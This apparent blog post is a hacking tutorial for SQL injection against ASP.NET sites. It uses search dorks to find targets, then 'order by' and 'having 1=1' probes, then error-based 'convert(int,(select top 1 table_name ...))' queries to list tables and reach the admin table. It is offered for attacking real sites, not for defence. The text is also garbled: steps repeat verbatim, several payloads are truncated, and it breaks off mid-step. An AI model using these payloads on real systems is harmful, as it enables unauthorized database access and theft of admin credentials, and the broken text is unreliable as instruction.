1) seach aaspx website.
for this step you can use one of this dorks
".aspx?bookID= " OR ".php?id= "
2) If you found one lets check if the website is vulnverable. Add this text after the url
"order by 1--"
example : http://www.target.com/index.aspx?Id=1 order by 1--
Now you will get a Error : "Page not found" or something like that.
3) Lets go on and begin with the Injection the first step of every injection is to find out the columns.
for this step we use :
"having 1=1"
you only have to copy it behind the url
example : http://www.target.com/index.aspx?Id=1 having 1=1
4) Well lets go on and search the tables. Use this code for it
and 1=convert
example : http://www.target.com/index.aspx?Id=1 and 1=convert
The output is the first table of the databse. But this table don't helps you .
You need to find the admin table.
Use this query to get the next table :
"and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))
Now we get the name of the admin table. The Admintable name is in this example "Administration"
5) Now lets get into the table Administration
use this query for it:
and 1=convert
for this step you can use one of this dorks
".aspx?bookID= " OR ".php?id= "
2) If you found one lets check if the website is vulnverable. Add this text after the url
"order by 1--"
example : http://www.target.com/index.aspx?Id=1 order by 1--
Now you will get a Error : "Page not found" or something like that.
3) Lets go on and begin with the Injection the first step of every injection is to find out the columns.
for this step we use :
"having 1=1"
you only have to copy it behind the url
example : http://www.target.com/index.aspx?Id=1 having 1=1
4) Well lets go on and search the tables. Use this code for it
and 1=convert
example : http://www.target.com/index.aspx?Id=1 and 1=convert
The output is the first table of the databse. But this table don't helps you .
You need to find the admin table.
Use this query to get the next table :
"and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))
Now we get the name of the admin table. The Admintable name is in this example "Administration"
5) Now lets get into the table Administration
use this query for it:
and 1=convert
No comments:
Post a Comment